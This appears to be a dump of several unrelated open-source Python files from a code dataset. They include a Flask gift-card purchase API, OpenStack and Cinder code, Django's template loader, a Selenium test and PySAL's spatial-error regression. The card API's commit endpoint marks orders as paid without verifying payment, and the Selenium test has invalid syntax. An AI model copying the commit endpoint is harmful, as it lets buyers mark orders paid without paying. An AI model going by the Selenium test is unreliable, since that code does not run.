# 非自定义code不必填写。
}}
logger.debug('[ApiCardReceive] out: return[%s]' % data)
return data
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiCardReceive] customer[%s] receive card[%s] error:%s' % (openid, sign, e.message))
return {'result': 255, 'data': e.message}
class ApiCardBuy(Resource):
def post(self):
try:
args = request.values
logger.info('[ApiCardBuy] args:%s' % args)
card_id = args.get('cardId')
price = args.get('price')
count = args.get('count')
openid = args.get('openId')
order = create_order(card_id, float(price), openid, count)
if not order:
return {'result': 250}
res, outputs = payable(request, openid, order)
logger.info('[ApiCardBuy] data:%s' % str(outputs))
if res == 0:
outputs['orderId'] = order.order_id
logger.info('[ApiCardBuy] create temp order success:%s' % order.order_id)
return {'result': 0, 'content': outputs}
logger.warn('[ApiCardBuy] order:%s pre-pay failed:%d' % (order.order_id, res))
return {'result': res, 'msg': outputs}
except Exception as e:
logger.error('[ApiCardBuy] except:%s' % e.message)
return {'result': 254, 'msg': e.message}
class ApiCardBuyCommit(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardBuyCommit] in: args[%s]' % args)
order_id = args.get('orderId')
order = get_cache_order(order_id)
if not order:
logger.warn('[ApiCardBuyCommit] order:%s not exist' % order_id)
return {'result': 254}
try:
order.paid = True
db.session.add(order)
db.session.commit()
logger.info('[ApiCardBuyCommit] order:%s create success' % order_id)
return {'result': 0}
except Exception as e:
logger.error('[ApiCardBuyCommit] order:%s create error:%s' % (order_id, e.message))
return {'result': 255}
class ApiCardActive(Resource):
def post(self):
open_id = card_id = code = None
args = request.values
logger.debug('[ApiCardActive] in: args[%s]' % args)
try:
card_id = args.get('card_id')
encrypt_code = args.get('encrypt_code')
open_id = args.get('openid')
logger.info('[ApiCardActive] data=%s' % str(args))
helper = WeixinHelper()
code = helper.decrypt_card_code(encrypt_code)
if not code:
logger.error('[ApiCardActive] decrypt card code[%s,%s] error' % (open_id, card_id))
return {'result': 255}
card = CustomerCard.query.filter_by(customer_id=open_id, card_id=card_id, card_code=code).first()
active = helper.active_card(card.amount * 100, code, card_id, 0)
if not active:
logger.error('[ApiCardActive] active card[%s,%s,%s] error' % (open_id, card_id, code))
return {'result': 255}
card.status = 2
db.session.add(card)
db.session.commit()
logger.debug('[ApiCardActive] out: result[0]')
return {'result': 0}
except Exception as e:
logger.error('[ApiCardActive] active card[%s,%s,%s] exception:%s' % (open_id, card_id, code, e.message))
return {'result': 255}
restful_api.add_resource(ApiCardBuy, API_PREFIX + 'card/buy')
restful_api.add_resource(ApiCardBuyCommit, API_PREFIX + 'card/buy/commit')
restful_api.add_resource(ApiCardActive, API_PREFIX + 'card/active')
restful_api.add_resource(ApiCardMembers, API_PREFIX + 'cards')
restful_api.add_resource(ApiCardDispatch, API_PREFIX + 'card/dispatch')
restful_api.add_resource(ApiWxCardStatusUpdate, API_PREFIX + 'card/add/status/update')
restful_api.add_resource(ApiCardPayCode, API_PREFIX + 'card/pay/code')
restful_api.add_resource(ApiCardPayRecords, API_PREFIX + 'card/pay/records')
restful_api.add_resource(ApiCardShareCheck, API_PREFIX + 'card/share/check')
restful_api.add_resource(ApiCardShare, API_PREFIX + 'card/share')
restful_api.add_resource(ApiCardShareInfo, API_PREFIX + 'card/share/info')
restful_api.add_resource(ApiCardReceiveCheck, API_PREFIX + 'card/receive/check')
restful_api.add_resource(ApiCardReceive, API_PREFIX + 'card/receive')
| apache-2.0 | -2,127,617,221,530,204,200 | 5,294,499,378,136,740,000 | 41.844186 | 119 | 0.558975 | false |
ntt-sic/nova | nova/tests/api/openstack/compute/contrib/test_cloudpipe_update.py | 27 | 2817 | # Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.api.openstack.compute.contrib import cloudpipe_update
from nova import db
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_network
fake_networks = [fake_network.fake_network(1),
fake_network.fake_network(2)]
def fake_project_get_networks(context, project_id, associate=True):
return fake_networks
def fake_network_update(context, network_id, values):
for network in fake_networks:
if network['id'] == network_id:
for key in values:
network[key] = values[key]
class CloudpipeUpdateTest(test.NoDBTestCase):
def setUp(self):
super(CloudpipeUpdateTest, self).setUp()
self.controller = cloudpipe_update.CloudpipeUpdateController()
self.stubs.Set(db, "project_get_networks", fake_project_get_networks)
self.stubs.Set(db, "network_update", fake_network_update)
def test_cloudpipe_configure_project(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-cloudpipe/configure-project')
body = {"configure_project": {"vpn_ip": "1.2.3.4", "vpn_port": 222}}
result = self.controller.update(req, 'configure-project',
body=body)
self.assertEqual('202 Accepted', result.status)
self.assertEqual(fake_networks[0]['vpn_public_address'], "1.2.3.4")
self.assertEqual(fake_networks[0]['vpn_public_port'], 222)
def test_cloudpipe_configure_project_bad_url(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-cloudpipe/configure-projectx')
body = {"vpn_ip": "1.2.3.4", "vpn_port": 222}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req,
'configure-projectx', body)
def test_cloudpipe_configure_project_bad_data(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/os-cloudpipe/configure-project')
body = {"vpn_ipxx": "1.2.3.4", "vpn_port": 222}
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.update, req,
'configure-project', body)
| apache-2.0 | 6,550,269,951,439,406,000 | -2,445,848,965,296,620,000 | 38.676056 | 78 | 0.647142 | false |
shadowmint/nwidget | lib/pyglet-1.4.4/contrib/wydget/wydget/widgets/progress.py | 29 | 1570 | from pyglet.gl import *
from wydget import loadxml
from wydget import util
from wydget.widgets.label import Label
class Progress(Label):
name = 'progress'
def __init__(self, parent, value=0.0, show_value=True,
bar_color='gray', bgcolor=(.3, .3, .3, 1), color='white',
width=None, height=16, halign='center', valign='center', **kw):
self._value = util.parse_value(value, 0)
self.show_value = show_value
self.bar_color = util.parse_color(bar_color)
super(Progress, self).__init__(parent, ' ', width=width,
height=height, bgcolor=bgcolor, color=color, halign=halign,
valign=valign, **kw)
if self.show_value:
self.text = '%d%%'%(value * 100)
def set_value(self, value):
self._value = value
if self.show_value:
self.text = '%d%%'%(value * 100)
value = property(lambda self: self._value, set_value)
def renderBackground(self, rect):
super(Progress, self).renderBackground(rect)
r = rect.copy()
r.width *= self._value
b, self.bgcolor = self.bgcolor, self.bar_color
super(Progress, self).renderBackground(r)
self.bgcolor = b
@classmethod
def fromXML(cls, element, parent):
'''Create the object from the XML element and attach it to the parent.
'''
kw = loadxml.parseAttributes(element)
obj = cls(parent, **kw)
for child in element.getchildren():
loadxml.getConstructor(element.tag)(child, obj)
return obj
| apache-2.0 | -2,150,669,492,540,313,900 | -877,277,776,009,679,200 | 32.404255 | 78 | 0.598726 | false |
winndows/cinder | cinder/db/sqlalchemy/migrate_repo/versions/034_volume_type_add_desc_column.py | 31 | 1274 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column, MetaData, Table, String
def upgrade(migrate_engine):
"""Add description column to volume_types."""
meta = MetaData()
meta.bind = migrate_engine
volume_types = Table('volume_types', meta, autoload=True)
description = Column('description', String(255))
volume_types.create_column(description)
volume_types.update().values(description=None).execute()
def downgrade(migrate_engine):
"""Remove description column to volumes."""
meta = MetaData()
meta.bind = migrate_engine
volume_types = Table('volume_types', meta, autoload=True)
description = volume_types.columns.description
volume_types.drop_column(description)
| apache-2.0 | 5,347,915,970,605,109,000 | -7,411,560,095,863,496,000 | 35.4 | 78 | 0.717425 | false |
faun/django_test | build/lib/django/template/loader.py | 16 | 8033 | # Wrapper for loading templates from storage of some sort (e.g. filesystem, database).
#
# This uses the TEMPLATE_LOADERS setting, which is a list of loaders to use.
# Each loader is expected to have this interface:
#
# callable(name, dirs=[])
#
# name is the template name.
# dirs is an optional list of directories to search instead of TEMPLATE_DIRS.
#
# The loader should return a tuple of (template_source, path). The path returned
# might be shown to the user for debugging purposes, so it should identify where
# the template was loaded from.
#
# A loader may return an already-compiled template instead of the actual
# template source. In that case the path returned should be None, since the
# path information is associated with the template during the compilation,
# which has already been done.
#
# Each loader should have an "is_usable" attribute set. This is a boolean that
# specifies whether the loader can be used in this Python installation. Each
# loader is responsible for setting this when it's initialized.
#
# For example, the eggs loader (which is capable of loading templates from
# Python eggs) sets is_usable to False if the "pkg_resources" module isn't
# installed, because pkg_resources is necessary to read eggs.
from django.core.exceptions import ImproperlyConfigured
from django.template import Origin, Template, Context, TemplateDoesNotExist, add_to_builtins
from django.utils.importlib import import_module
from django.conf import settings
template_source_loaders = None
class BaseLoader(object):
is_usable = False
def __init__(self, *args, **kwargs):
pass
def __call__(self, template_name, template_dirs=None):
return self.load_template(template_name, template_dirs)
def load_template(self, template_name, template_dirs=None):
source, display_name = self.load_template_source(template_name, template_dirs)
origin = make_origin(display_name, self.load_template_source, template_name, template_dirs)
try:
template = get_template_from_string(source, origin, template_name)
return template, None
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist, back off to
# returning the source and display name for the template we were asked to load.
# This allows for correct identification (later) of the actual template that does
# not exist.
return source, display_name
def load_template_source(self, template_name, template_dirs=None):
"""
Returns a tuple containing the source and origin for the given template
name.
"""
raise NotImplementedError
def reset(self):
"""
Resets any state maintained by the loader instance (e.g., cached
templates or cached loader modules).
"""
pass
class LoaderOrigin(Origin):
def __init__(self, display_name, loader, name, dirs):
super(LoaderOrigin, self).__init__(display_name)
self.loader, self.loadname, self.dirs = loader, name, dirs
def reload(self):
return self.loader(self.loadname, self.dirs)[0]
def make_origin(display_name, loader, name, dirs):
if settings.TEMPLATE_DEBUG and display_name:
return LoaderOrigin(display_name, loader, name, dirs)
else:
return None
def find_template_loader(loader):
if isinstance(loader, (tuple, list)):
loader, args = loader[0], loader[1:]
else:
args = []
if isinstance(loader, basestring):
module, attr = loader.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
try:
TemplateLoader = getattr(mod, attr)
except AttributeError, e:
raise ImproperlyConfigured('Error importing template source loader %s: "%s"' % (loader, e))
if hasattr(TemplateLoader, 'load_template_source'):
func = TemplateLoader(*args)
else:
# Try loading module the old way - string is full path to callable
if args:
raise ImproperlyConfigured("Error importing template source loader %s - can't pass arguments to function-based loader." % loader)
func = TemplateLoader
if not func.is_usable:
import warnings
warnings.warn("Your TEMPLATE_LOADERS setting includes %r, but your Python installation doesn't support that type of template loading. Consider removing that line from TEMPLATE_LOADERS." % loader)
return None
else:
return func
else:
raise ImproperlyConfigured('Loader does not define a "load_template" callable template source loader')
def find_template(name, dirs=None):
# Calculate template_source_loaders the first time the function is executed
# because putting this logic in the module-level namespace may cause
# circular import errors. See Django ticket #1292.
global template_source_loaders
if template_source_loaders is None:
loaders = []
for loader_name in settings.TEMPLATE_LOADERS:
loader = find_template_loader(loader_name)
if loader is not None:
loaders.append(loader)
template_source_loaders = tuple(loaders)
for loader in template_source_loaders:
try:
source, display_name = loader(name, dirs)
return (source, make_origin(display_name, loader, name, dirs))
except TemplateDoesNotExist:
pass
raise TemplateDoesNotExist(name)
def find_template_source(name, dirs=None):
# For backward compatibility
import warnings
warnings.warn(
"`django.template.loaders.find_template_source` is deprecated; use `django.template.loaders.find_template` instead.",
DeprecationWarning
)
template, origin = find_template(name, dirs)
if hasattr(template, 'render'):
raise Exception("Found a compiled template that is incompatible with the deprecated `django.template.loaders.find_template_source` function.")
return template, origin
def get_template(template_name):
"""
Returns a compiled Template object for the given template name,
handling template inheritance recursively.
"""
template, origin = find_template(template_name)
if not hasattr(template, 'render'):
# template needs to be compiled
template = get_template_from_string(template, origin, template_name)
return template
def get_template_from_string(source, origin=None, name=None):
"""
Returns a compiled Template object for the given template code,
handling template inheritance recursively.
"""
return Template(source, origin, name)
def render_to_string(template_name, dictionary=None, context_instance=None):
"""
Loads the given template_name and renders it with the given dictionary as
context. The template_name may be a string to load a single template using
get_template, or it may be a tuple to use select_template to find one of
the templates in the list. Returns a string.
"""
dictionary = dictionary or {}
if isinstance(template_name, (list, tuple)):
t = select_template(template_name)
else:
t = get_template(template_name)
if context_instance:
context_instance.update(dictionary)
else:
context_instance = Context(dictionary)
return t.render(context_instance)
def select_template(template_name_list):
"Given a list of template names, returns the first that can be loaded."
for template_name in template_name_list:
try:
return get_template(template_name)
except TemplateDoesNotExist:
continue
# If we get here, none of the templates could be loaded
raise TemplateDoesNotExist(', '.join(template_name_list))
add_to_builtins('django.template.loader_tags')
| bsd-3-clause | -7,761,802,182,906,491,000 | -7,098,664,297,805,954,000 | 39.570707 | 207 | 0.685298 | false |
StanislavQA/python_task | timeweb2.py | 1 | 2037 | # -*- coding: utf-8 -*-
from selenium.webdriver.firefox.webdriver import WebDriver
import unittest
def is_alert_present(wd):
try:
wd.switch_to_alert().text
return True
except:
return False
class timeweb2(unittest.TestCase):
def setUp(self):
self.wd = WebDriver()
self.wd.implicitly_wait(60)
def test_timeweb2(self):
wd = self.wd
self.open_home_page(wd)
self.tariff_plan(wd)
self.login(wd, username = "Чернядьева Анна Константиновна", email = "[email protected]")
def login(self, wd, username, email):
wd.find_element_by_xpath(
"//div[@class='overlay']/div/div/div[14]/form/div[2]/div[1]/div[2]/div[2]/input").click()
wd.find_element_by_xpath(
"//div[@class='overlay']/div/div/div[14]/form/div[2]/div[1]/div[2]/div[2]/input").clear()
wd.find_element_by_xpath(
"//div[@class='overlay']/div/div/div[14]/form/div[2]/div[1]/div[2]/div[2]/input").send_keys(
username)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(email)
wd.find_element_by_xpath("//label[@for='c4']").click()
if not wd.find_element_by_id("c4").is_selected():
wd.find_element_by_id("c4").click()
wd.find_element_by_link_text("ЗАКАЗАТЬ").click()
def tariff_plan(self, wd):
wd.find_element_by_link_text("ХОСТИНГ").click()
wd.find_element_by_link_text("РАЗМЕСТИТЬ САЙТ").click()
wd.find_element_by_css_selector("li.item.selected").click()
def open_home_page(self, wd):
wd.get("https://timeweb.com/ru/")
# Check for compliance with the selected plan
def check_exists_by_link_text("Year+"):
return len(webdriver.find_elements_by_link_text("Year+")) > 0
def tearDown(self):
self.wd.quit()
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -3,668,871,174,778,105,300 | -6,991,801,999,901,373,000 | 35 | 104 | 0.599495 | false |
Lilykos/inspire-next | inspire/modules/workflows/views/holdingpen_edit.py | 1 | 3372 | # -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2015 CERN.
#
# INSPIRE is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
# 59 Tseemple Place, Suite 330, Boston, MA 02111-1307, USA.
from six import text_type
from flask import Blueprint, jsonify, request
from flask_login import login_required
from harvestingkit.html_utils import MathMLParser
from invenio.base.decorators import wash_arguments
from invenio.ext.principal import permission_required
from invenio.modules.workflows.acl import viewholdingpen
from invenio.modules.workflows.models import BibWorkflowObject
blueprint = Blueprint(
'inspire_holdingpen',
__name__,
url_prefix="/admin/holdingpen",
template_folder='../templates',
static_folder="../static",
)
# Constants
SUBJECT_TERM = "subject_term"
TERM = "term"
SCHEME = "scheme"
INSPIRE_SCHEME = "INSPIRE"
# Fields
SUBJECT_FIELD = "subject_term.term"
TITLE_FIELD = "title.title"
@blueprint.route('/edit_record_title', methods=['POST'])
@login_required
@permission_required(viewholdingpen.name)
@wash_arguments({'value': (text_type, ""),
'objectid': (int, 0)})
def edit_record_title(value, objectid):
editable_obj = BibWorkflowObject.query.get(objectid)
data = editable_obj.get_data()
data[TITLE_FIELD] = MathMLParser.html_to_text(value)
editable_obj.set_data(data)
editable_obj.save()
return jsonify({
"category": "success",
"message": "Edit on title was successful"
})
@blueprint.route('/edit_record_subject', methods=['POST'])
@login_required
@permission_required(viewholdingpen.name)
@wash_arguments({'objectid': (text_type, "")})
def edit_record_subject(objectid):
editable_obj = BibWorkflowObject.query.get(objectid)
data = editable_obj.get_data()
old_subjects_list = data[SUBJECT_FIELD]
new_subjects_list = request.values.getlist('subjects[]') or []
# We will use a diff method to find which
# subjects to remove and which to add.
# PLUS removes unicode
to_remove = [str(x) for x in list(set(old_subjects_list) - set(new_subjects_list))]
to_add = [str(x) for x in list(set(new_subjects_list) - set(old_subjects_list))]
# Make a copy of the original list
subject_objects = []
subject_objects.extend(data[SUBJECT_TERM])
# Remove subjects
subject_objects = [subj for subj in subject_objects
if subj[TERM] not in to_remove ]
# Add the new subjects
for subj in to_add:
subject_objects.append({
TERM: subj,
SCHEME: INSPIRE_SCHEME
})
data[SUBJECT_TERM] = subject_objects
editable_obj.set_data(data)
editable_obj.save()
return jsonify({
"category": "success",
"message": "Edit on subjects was successful"
})
| gpl-2.0 | -4,695,978,596,771,673,000 | -752,599,306,971,032,300 | 30.222222 | 87 | 0.694247 | false |
ljwolf/pysal | pysal/spreg/ml_error.py | 6 | 19663 | """
ML Estimation of Spatial Error Model
"""
__author__ = "Luc Anselin [email protected],\
Serge Rey [email protected], \
Levi Wolf [email protected]"
import numpy as np
import numpy.linalg as la
from scipy import sparse as sp
from scipy.sparse.linalg import splu as SuperLU
import pysal as ps
from utils import RegressionPropsY, RegressionPropsVM
import diagnostics as DIAG
import user_output as USER
import summary_output as SUMMARY
import regimes as REGI
from w_utils import symmetrize
try:
from scipy.optimize import minimize_scalar
minimize_scalar_available = True
except ImportError:
minimize_scalar_available = False
from .sputils import spdot, spfill_diagonal, spinv
__all__ = ["ML_Error"]
class BaseML_Error(RegressionPropsY, RegressionPropsVM, REGI.Regimes_Frame):
"""
ML estimation of the spatial error model (note no consistency
checks, diagnostics or constants added); Anselin (1988) [Anselin1988]_
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
w : Sparse matrix
Spatial weights sparse matrix
method : string
if 'full', brute force calculation (full matrix expressions)
if 'ord', Ord eigenvalue calculation
if 'LU', LU decomposition for sparse matrices
epsilon : float
tolerance criterion in mimimize_scalar function and inverse_product
regimes_att : dictionary
Dictionary containing elements to be used in case of a regimes model,
i.e. 'x' before regimes, 'regimes' list and 'cols2regi'
Attributes
----------
betas : array
kx1 array of estimated coefficients
lam : float
estimate of spatial autoregressive coefficient
u : array
nx1 array of residuals
e_filtered : array
spatially filtered residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
k : integer
Number of variables for which coefficients are estimated
(including the constant, excluding the rho)
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
method : string
log Jacobian method
if 'full': brute force (full matrix computations)
if 'ord' : Ord eigenvalue method
epsilon : float
tolerance criterion used in minimize_scalar function and inverse_product
mean_y : float
Mean of dependent variable
std_y : float
Standard deviation of dependent variable
vm : array
Variance covariance matrix (k+1 x k+1) - includes lambda
vm1 : array
2x2 array of variance covariance for lambda, sigma
sig2 : float
Sigma squared used in computations
logll : float
maximized log-likelihood (including constant terms)
Examples
--------
>>> import numpy as np
>>> import pysal as ps
>>> np.set_printoptions(suppress=True) #prevent scientific format
>>> db = ps.open(ps.examples.get_path("south.dbf"),'r')
>>> y_name = "HR90"
>>> y = np.array(db.by_col(y_name))
>>> y.shape = (len(y),1)
>>> x_names = ["RD90","PS90","UE90","DV90"]
>>> x = np.array([db.by_col(var) for var in x_names]).T
>>> x = np.hstack((np.ones((len(y),1)),x))
>>> ww = ps.open(ps.examples.get_path("south_q.gal"))
>>> w = ww.read()
>>> ww.close()
>>> w.transform = 'r'
>>> mlerr = BaseML_Error(y,x,w) #doctest: +SKIP
>>> "{0:.6f}".format(mlerr.lam) #doctest: +SKIP
'0.299078'
>>> np.around(mlerr.betas, decimals=4) #doctest: +SKIP
array([[ 6.1492],
[ 4.4024],
[ 1.7784],
[-0.3781],
[ 0.4858],
[ 0.2991]])
>>> "{0:.6f}".format(mlerr.mean_y) #doctest: +SKIP
'9.549293'
>>> "{0:.6f}".format(mlerr.std_y) #doctest: +SKIP
'7.038851'
>>> np.diag(mlerr.vm) #doctest: +SKIP
array([ 1.06476526, 0.05548248, 0.04544514, 0.00614425, 0.01481356,
0.00143001])
>>> "{0:.6f}".format(mlerr.sig2[0][0]) #doctest: +SKIP
'32.406854'
>>> "{0:.6f}".format(mlerr.logll) #doctest: +SKIP
'-4471.407067'
>>> mlerr1 = BaseML_Error(y,x,w,method='ord') #doctest: +SKIP
>>> "{0:.6f}".format(mlerr1.lam) #doctest: +SKIP
'0.299078'
>>> np.around(mlerr1.betas, decimals=4) #doctest: +SKIP
array([[ 6.1492],
[ 4.4024],
[ 1.7784],
[-0.3781],
[ 0.4858],
[ 0.2991]])
>>> "{0:.6f}".format(mlerr1.mean_y) #doctest: +SKIP
'9.549293'
>>> "{0:.6f}".format(mlerr1.std_y) #doctest: +SKIP
'7.038851'
>>> np.around(np.diag(mlerr1.vm), decimals=4) #doctest: +SKIP
array([ 1.0648, 0.0555, 0.0454, 0.0061, 0.0148, 0.0014])
>>> "{0:.4f}".format(mlerr1.sig2[0][0]) #doctest: +SKIP
'32.4069'
>>> "{0:.4f}".format(mlerr1.logll) #doctest: +SKIP
'-4471.4071'
"""
def __init__(self, y, x, w, method='full', epsilon=0.0000001, regimes_att=None):
# set up main regression variables and spatial filters
self.y = y
if regimes_att:
self.x = x.toarray()
else:
self.x = x
self.n, self.k = self.x.shape
self.method = method
self.epsilon = epsilon
#W = w.full()[0] #wait to build pending what is needed
#Wsp = w.sparse
ylag = ps.lag_spatial(w, self.y)
xlag = self.get_x_lag(w, regimes_att)
# call minimizer using concentrated log-likelihood to get lambda
methodML = method.upper()
if methodML in ['FULL', 'LU', 'ORD']:
if methodML == 'FULL':
W = w.full()[0] # need dense here
res = minimize_scalar(err_c_loglik, 0.0, bounds=(-1.0, 1.0),
args=(self.n, self.y, ylag, self.x,
xlag, W), method='bounded',
tol=epsilon)
elif methodML == 'LU':
I = sp.identity(w.n)
Wsp = w.sparse # need sparse here
res = minimize_scalar(err_c_loglik_sp, 0.0, bounds=(-1.0,1.0),
args=(self.n, self.y, ylag,
self.x, xlag, I, Wsp),
method='bounded', tol=epsilon)
W = Wsp
elif methodML == 'ORD':
# check on symmetry structure
if w.asymmetry(intrinsic=False) == []:
ww = symmetrize(w)
WW = np.array(ww.todense())
evals = la.eigvalsh(WW)
W = WW
else:
W = w.full()[0] # need dense here
evals = la.eigvals(W)
res = minimize_scalar(
err_c_loglik_ord, 0.0, bounds=(-1.0, 1.0),
args=(self.n, self.y, ylag, self.x,
xlag, evals), method='bounded',
tol=epsilon)
else:
raise Exception("{0} is an unsupported method".format(method))
self.lam = res.x
# compute full log-likelihood, including constants
ln2pi = np.log(2.0 * np.pi)
llik = -res.fun - self.n / 2.0 * ln2pi - self.n / 2.0
self.logll = llik
# b, residuals and predicted values
ys = self.y - self.lam * ylag
xs = self.x - self.lam * xlag
xsxs = np.dot(xs.T, xs)
xsxsi = np.linalg.inv(xsxs)
xsys = np.dot(xs.T, ys)
b = np.dot(xsxsi, xsys)
self.betas = np.vstack((b, self.lam))
self.u = y - np.dot(self.x, b)
self.predy = self.y - self.u
# residual variance
self.e_filtered = self.u - self.lam * ps.lag_spatial(w, self.u)
self.sig2 = np.dot(self.e_filtered.T, self.e_filtered) / self.n
# variance-covariance matrix betas
varb = self.sig2 * xsxsi
# variance-covariance matrix lambda, sigma
a = -self.lam * W
spfill_diagonal(a, 1.0)
ai = spinv(a)
wai = spdot(W, ai)
tr1 = wai.diagonal().sum()
wai2 = spdot(wai, wai)
tr2 = wai2.diagonal().sum()
waiTwai = spdot(wai.T, wai)
tr3 = waiTwai.diagonal().sum()
v1 = np.vstack((tr2 + tr3,
tr1 / self.sig2))
v2 = np.vstack((tr1 / self.sig2,
self.n / (2.0 * self.sig2 ** 2)))
v = np.hstack((v1, v2))
self.vm1 = np.linalg.inv(v)
# create variance matrix for beta, lambda
vv = np.hstack((varb, np.zeros((self.k, 1))))
vv1 = np.hstack(
(np.zeros((1, self.k)), self.vm1[0, 0] * np.ones((1, 1))))
self.vm = np.vstack((vv, vv1))
def get_x_lag(self, w, regimes_att):
if regimes_att:
xlag = ps.lag_spatial(w, regimes_att['x'])
xlag = REGI.Regimes_Frame.__init__(self, xlag,
regimes_att['regimes'], constant_regi=None, cols2regi=regimes_att['cols2regi'])[0]
xlag = xlag.toarray()
else:
xlag = ps.lag_spatial(w, self.x)
return xlag
class ML_Error(BaseML_Error):
"""
ML estimation of the spatial lag model with all results and diagnostics;
Anselin (1988) [Anselin1988]_
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
w : Sparse matrix
Spatial weights sparse matrix
method : string
if 'full', brute force calculation (full matrix expressions)
if 'ord', Ord eigenvalue method
if 'LU', LU sparse matrix decomposition
epsilon : float
tolerance criterion in mimimize_scalar function and inverse_product
spat_diag : boolean
if True, include spatial diagnostics
vm : boolean
if True, include variance-covariance matrix in summary
results
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_w : string
Name of weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
betas : array
(k+1)x1 array of estimated coefficients (rho first)
lam : float
estimate of spatial autoregressive coefficient
u : array
nx1 array of residuals
e_filtered : array
nx1 array of spatially filtered residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
k : integer
Number of variables for which coefficients are estimated
(including the constant, excluding lambda)
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
method : string
log Jacobian method
if 'full': brute force (full matrix computations)
epsilon : float
tolerance criterion used in minimize_scalar function and inverse_product
mean_y : float
Mean of dependent variable
std_y : float
Standard deviation of dependent variable
varb : array
Variance covariance matrix (k+1 x k+1) - includes var(lambda)
vm1 : array
variance covariance matrix for lambda, sigma (2 x 2)
sig2 : float
Sigma squared used in computations
logll : float
maximized log-likelihood (including constant terms)
pr2 : float
Pseudo R squared (squared correlation between y and ypred)
utu : float
Sum of squared residuals
std_err : array
1xk array of standard errors of the betas
z_stat : list of tuples
z statistic; each tuple contains the pair (statistic,
p-value), where each is a float
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_w : string
Name of weights matrix for use in output
name_ds : string
Name of dataset for use in output
title : string
Name of the regression method used
Examples
--------
>>> import numpy as np
>>> import pysal as ps
>>> np.set_printoptions(suppress=True) #prevent scientific format
>>> db = ps.open(ps.examples.get_path("south.dbf"),'r')
>>> ds_name = "south.dbf"
>>> y_name = "HR90"
>>> y = np.array(db.by_col(y_name))
>>> y.shape = (len(y),1)
>>> x_names = ["RD90","PS90","UE90","DV90"]
>>> x = np.array([db.by_col(var) for var in x_names]).T
>>> ww = ps.open(ps.examples.get_path("south_q.gal"))
>>> w = ww.read()
>>> ww.close()
>>> w_name = "south_q.gal"
>>> w.transform = 'r'
>>> mlerr = ML_Error(y,x,w,name_y=y_name,name_x=x_names,\
name_w=w_name,name_ds=ds_name) #doctest: +SKIP
>>> np.around(mlerr.betas, decimals=4) #doctest: +SKIP
array([[ 6.1492],
[ 4.4024],
[ 1.7784],
[-0.3781],
[ 0.4858],
[ 0.2991]])
>>> "{0:.4f}".format(mlerr.lam) #doctest: +SKIP
'0.2991'
>>> "{0:.4f}".format(mlerr.mean_y) #doctest: +SKIP
'9.5493'
>>> "{0:.4f}".format(mlerr.std_y) #doctest: +SKIP
'7.0389'
>>> np.around(np.diag(mlerr.vm), decimals=4) #doctest: +SKIP
array([ 1.0648, 0.0555, 0.0454, 0.0061, 0.0148, 0.0014])
>>> np.around(mlerr.sig2, decimals=4) #doctest: +SKIP
array([[ 32.4069]])
>>> "{0:.4f}".format(mlerr.logll) #doctest: +SKIP
'-4471.4071'
>>> "{0:.4f}".format(mlerr.aic) #doctest: +SKIP
'8952.8141'
>>> "{0:.4f}".format(mlerr.schwarz) #doctest: +SKIP
'8979.0779'
>>> "{0:.4f}".format(mlerr.pr2) #doctest: +SKIP
'0.3058'
>>> "{0:.4f}".format(mlerr.utu) #doctest: +SKIP
'48534.9148'
>>> np.around(mlerr.std_err, decimals=4) #doctest: +SKIP
array([ 1.0319, 0.2355, 0.2132, 0.0784, 0.1217, 0.0378])
>>> np.around(mlerr.z_stat, decimals=4) #doctest: +SKIP
array([[ 5.9593, 0. ],
[ 18.6902, 0. ],
[ 8.3422, 0. ],
[ -4.8233, 0. ],
[ 3.9913, 0.0001],
[ 7.9089, 0. ]])
>>> mlerr.name_y #doctest: +SKIP
'HR90'
>>> mlerr.name_x #doctest: +SKIP
